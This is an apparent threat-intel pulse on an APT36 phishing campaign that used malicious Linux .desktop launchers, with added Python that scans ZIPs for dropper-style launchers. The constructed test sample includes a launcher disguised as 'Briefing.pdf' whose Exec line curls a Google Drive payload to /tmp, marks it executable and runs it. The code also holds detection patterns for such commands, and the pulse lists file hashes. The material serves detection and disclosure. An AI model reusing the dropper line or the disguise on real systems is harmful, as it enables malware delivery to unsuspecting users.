Pakistan-linked APT36 (Transparent Tribe) launched a new cyber-espionage campaign targeting Indian government and defense entities. Active in August 2025, the group distributed phishing ZIP archives containing malicious Linux ".desktop" launcher files that fetched payloads from Google Drive. Author: AlienVault
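The lure described above is a ZIP carrying a .desktop file whose Exec= line downloads and runs a payload instead of launching an installed program. As an added example (not part of the AlienVault pulse and not a sample from the campaign), the Python below builds a constructed in-memory ZIP with one benign launcher and one dropper-style launcher, parses each .desktop member, and flags Exec= lines that wrap a shell, call curl/wget, embed a URL, or chmod a dropped file. The Google Drive URL, file names and heuristics are illustrative assumptions, not indicators from the pulse.

```python
"""Scan a ZIP archive for .desktop launchers whose Exec= line fetches and runs remote content."""
import io
import re
import zipfile

# Heuristics for an Exec= line that behaves like a downloader rather than a launcher.
# These patterns are an assumption for this example, not a published detection rule.
DOWNLOADER_TOOLS = re.compile(r"\b(curl|wget)\b")
URL = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
MAKE_EXEC = re.compile(r"\bchmod\s+\+?x\b|\bchmod\s+[0-7]*7[0-7]*\b")
SHELL_WRAPPER = re.compile(r"\b(sh|bash|dash)\s+-c\b")


def parse_desktop(text):
    """Return the key/value pairs of the [Desktop Entry] group (locale suffixes stripped)."""
    entries = {}
    in_group = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("["):
            in_group = line == "[Desktop Entry]"
            continue
        if in_group and "=" in line:
            key, value = line.split("=", 1)
            key = re.sub(r"\[.*\]$", "", key.strip())  # Name[en] -> Name
            entries.setdefault(key, value.strip())
    return entries


def suspicious_exec(entries):
    """Return the list of reasons a parsed .desktop entry looks like a dropper (empty if clean)."""
    reasons = []
    exec_line = entries.get("Exec", "")
    if SHELL_WRAPPER.search(exec_line):
        reasons.append("Exec wraps a shell (-c) instead of launching a program")
    if DOWNLOADER_TOOLS.search(exec_line):
        reasons.append("Exec invokes a downloader (curl/wget)")
    for url in URL.findall(exec_line):
        reasons.append(f"Exec contains a URL: {url}")
    if MAKE_EXEC.search(exec_line):
        reasons.append("Exec marks a file executable (chmod)")
    if entries.get("Terminal", "false").lower() == "false" and reasons:
        reasons.append("Terminal=false hides the shell session from the user")
    name = entries.get("Name", "")
    if re.search(r"\.(pdf|docx?|xlsx?)$", name, re.IGNORECASE):
        reasons.append(f"Name masquerades as a document: {name}")
    return reasons


def scan_zip(zip_bytes):
    """Scan every *.desktop member of an in-memory ZIP; return {member: [reasons]} for flagged ones."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".desktop"):
                continue
            text = zf.read(info).decode("utf-8", errors="replace")
            reasons = suspicious_exec(parse_desktop(text))
            if reasons:
                findings[info.filename] = reasons
    return findings


def build_sample_zip():
    """Constructed sample archive (not a real campaign artifact): one benign and one dropper-style launcher."""
    benign = "[Desktop Entry]\nType=Application\nName=Text Editor\nExec=gedit %U\nIcon=gedit\nTerminal=false\n"
    dropper = (
        "[Desktop Entry]\nType=Application\nName=Briefing.pdf\nIcon=application-pdf\nTerminal=false\n"
        # Hypothetical URL and paths; the id=EXAMPLE value is a placeholder, not a real file.
        'Exec=bash -c "curl -sL https://drive.google.com/uc?export=download&id=EXAMPLE -o /tmp/.x; '
        'chmod +x /tmp/.x; /tmp/.x"\n'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("editor.desktop", benign)
        zf.writestr("Briefing.pdf.desktop", dropper)
    return buf.getvalue()


if __name__ == "__main__":
    for member, reasons in scan_zip(build_sample_zip()).items():
        print(member)
        for r in reasons:
            print("  -", r)
```

The parser deliberately ignores everything outside the [Desktop Entry] group and strips locale suffixes so that a Name[en]= or Exec line split across localized keys is still inspected; a real triage pipeline would also check the Icon= value and whether the archive name or Name= field imitates a document, since the launcher only executes once the user double-clicks what looks like a PDF.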
Related Tags:
stealth server
linux desktop
ctfuft
icon data
critical sectors
stealth
websocket
T1064
syscall
Associated Indicators:
SHA-256:
7A946339439EB678316A124B8D700B21DE919C81EE5BEF33E8CB848B7183927B
34AD45374D5F5059CAD65E7057EC0F3E468F00234BE7C34DE033093EFC4DD83D
SHA-1:
DF4DB969A69EFC1DB59F4D3C596ED590EE059777
3E3169C513C02126028480421FB341A167CB9FCD
1982F09BFAB3A6688BB80249A079DB1A759214B7
508A3568C56ED4F613CFAFEF23FF12C81BA627EB
MD5:
6AC0FE0FA5D9AF8193610D710A7DA63C
566DDD4EB4CA8D4DD67B72EE7F944055
A484F85D132609A4A6B5ED65ECE7D331